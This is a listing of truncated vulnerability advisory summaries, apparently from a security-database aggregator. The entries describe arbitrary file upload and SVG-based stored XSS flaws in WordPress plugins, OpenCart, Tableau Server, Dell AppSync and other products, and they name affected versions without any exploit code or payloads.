CVE-2025-45893

OpenCart version 4.1.0.4 is vulnerable to a Stored Cross-Site Scripting XSS attack via SVG file uploads used in blog posts. The vulnerability arises because SVG files uploaded through the media manager are not properly sanitized. Attackers can craft a malicious SVG file containing embedded...

WordPress Ajax Load More plugin license issue vulnerability

WordPress Ajax Load More plugin is an open source plugin , mainly used to achieve infinite scrolling of website content and lazy loading function , optimize the user experience through AJAX technology . WordPress Ajax Load More plugin has an authorization issue vulnerability, the vulnerability...

PT-2025-30924 · Tableau · Tableau Server

Name of the Vulnerable Software and Affected Versions: Tableau Server versions prior to 2025.1.3 Tableau Server versions prior to 2024.2.12 Tableau Server versions prior to 2023.3.19 Description: Tableau Server contains a flaw in the Extensible Protocol Service modules that allows unrestricted fi...

WordPress plugin Droip 代码问题漏洞

WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a set of blogging platforms developed using the PHP language. The platform supports setting up personal blog sites on servers with PHP and MySQL.WordPress plugin is an application plugin. A code issue...

Dell AppSync File Upload Vulnerability

Dell AppSync is a data replication management application from Dell USA. A file upload vulnerability exists in Dell AppSync version 4.6.0.0, which stems from the application's lack of effective validation of uploaded files. The vulnerability can be exploited to remotely execute arbitrary code by...

PT-2025-51681

Name of the Vulnerable Software and Affected Versions Responsive Thumbnail Slider plugin for WordPress versions prior to 1.0.1 Description The software is susceptible to arbitrary file uploads because of inadequate file type validation within the image uploader. Attackers with subscriber-level...

CVE-2025-7852

The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the imageuploadhandle function hooked via the 'addnewcustomer' route in all versions up to, and including, 1.0.6. The plugin’s image‐upload handler calls moveuploadedfile on...

CVE-2025-7437 Ebook Store <= 5.8012 - Unauthenticated Arbitrary File Upload

The Ebook Store plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ebookstoresaveform function in all versions up to, and including, 5.8012. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's...

CVE-2025-7437 Ebook Store <= 5.8012 - Unauthenticated Arbitrary File Upload

The Ebook Store plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ebookstoresaveform function in all versions up to, and including, 5.8012. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's...

CVE-2012-10020

The FoxyPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadify.php file in versions up to, and including, 0.4.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may...

PT-2025-30632 · WordPress · Ebook Store

Name of the Vulnerable Software and Affected Versions: Ebook Store plugin for WordPress versions prior to 5.8012 Description: The Ebook Store plugin for WordPress is susceptible to arbitrary file uploads because of a lack of file type validation within the ebook store save form function. This...

CVE-2025-54439

Unrestricted Upload of File with Dangerous Type vulnerability in Samsung Electronics MagicINFO 9 Server allows Code Injection.This issue affects MagicINFO 9 Server: less than 21.1080.0...

CVE-2015-10137

The Website Contact Form With File Upload plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'uploadfile' function in versions up to, and including, 1.3.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the...

CVE-2012-10020

CVE-2012-10020 affects the FoxyPress WordPress plugin. Up to version 0.4.2.1, it allows unauthenticated arbitrary file uploads via uploadify.php due to missing file type validation, potentially enabling remote code execution. Affected software: FoxyPress plugin for WordPress (versions ≤ 0.4.2.1)....

PT-2025-30401

The BSK PDF Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access an...

WordPress plugin Ajax Load More 安全漏洞

WordPress Ajax Load More plugin is an open source plugin , mainly used to achieve infinite scrolling of website content and lazy loading function , optimize the user experience through AJAX technology . WordPress Ajax Load More plugin has an authorization issue vulnerability, the vulnerability...

CVE-2025-46120

An issue was discovered in CommScope Ruckus Unleashed prior to 200.15.6.212.27 and 200.18.7.1.323, and in Ruckus ZoneDirector prior to 10.5.1.0.282, where a path-traversal flaw in the web interface lets the server execute attacker-supplied EJS templates outside permitted directories, allowing a...

CVE-2025-6997

The ThemeREX Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.35.1.1 due to insufficient input sanitization and output escaping. The plugin’s SVG rendering routine calls the trxaddonsgetsvgfromfile function on an...

PT-2025-30202 · Harry0703 · Moneyprinterturbo

Name of the Vulnerable Software and Affected Versions: harry0703 MoneyPrinterTurbo versions through 1.2.6 Description: A critical issue exists in harry0703 MoneyPrinterTurbo. The upload bgm file function within the File Extension Handler component, located in the app/controllers/v1/video.py file,...

Thinkgem JeeSite 代码问题漏洞

Thinkgem JeeSite is an open source Java EE enterprise-class rapid development platform of China Joyuan Thinkgem company . The platform includes system permissions components , data permissions components , data dictionary components , core tools components , view manipulation components , workflo...